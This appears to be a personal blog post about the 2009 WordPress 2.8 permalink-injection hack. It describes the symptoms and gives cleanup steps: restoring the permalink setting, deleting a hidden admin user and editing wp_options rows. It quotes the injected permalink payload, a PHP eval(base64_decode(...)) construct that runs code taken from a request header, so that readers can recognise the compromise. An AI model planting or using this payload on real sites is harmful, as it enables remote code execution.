WordPress mysql injection permalink

Last updated on May 25th, 2016 at 01:28 pm

WordPress mysql injection permalink, WP 2.8 versions security vulnerability

WordPress MySQL Injection – Permalink hack %&({${eval(base64_decode($_SERVER[HTTTP_REFFER]

Just want to write up a quick post on the latest WordPress MySQL Injection that has seemed to attack many of the WordPress blogs – including several of my own. I just  logged in now to my admin panel and was surprised to see my permanent link structure is injected with some extra redirect script. Weird and now its rectified.But I have to find a permanent fix for this issue.

I saw my URL like this:

Put your mouse cursor over a permalink (or over a post title) and see if it has the following string appearing in the URL:

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

If  you have this weird URI then you have been hacked! 🙁

How to Fix?

Login to your WordPress dashboard and go to Settings -> Permalinks

Change your permalink structure to what you had before.

 

Next step is to remove a hidden admin user to your blog.  You will most likely not be able to see who this is if you go to Users tab:

You will be amazed to see that another user is also having the admin privileges. So just delete that user entry.

Now as a preventive mechanism i have taken away the registration system from the website for the time being.

Here is the video tutorial to explain you in practical how this is happening

Solution for nasty url (MySQL Injection) in Wp 2.8.*:

Use phpMyAdmin to browse WordPress MySQL database tables. Go to wp_options table,

•  empty the row named _transient_rewrite_rules
•  edit the row named permalink_structure –>

So always keep an eye on your WordPress 2.8.* because it has a possibility that at any time this version of WordPress can be hacked. I will be checking for a permanent solution soon.

WordPress responds to the attack

http://mashable.com/2009/09/05/wordpress-please-upgrade/

http://mashable.com/2009/09/05/wordpress-attack/

You know the hacker has caused me around 14 hrs outage 🙁 , i will track him out sure.

This is an old post when WordPress was on 2.8.* version. Now the current version of WordPress is 4.5.2 (As of 25th May 2016). This post may be really helpful or may provide a tip for any such issues you might face with your blog.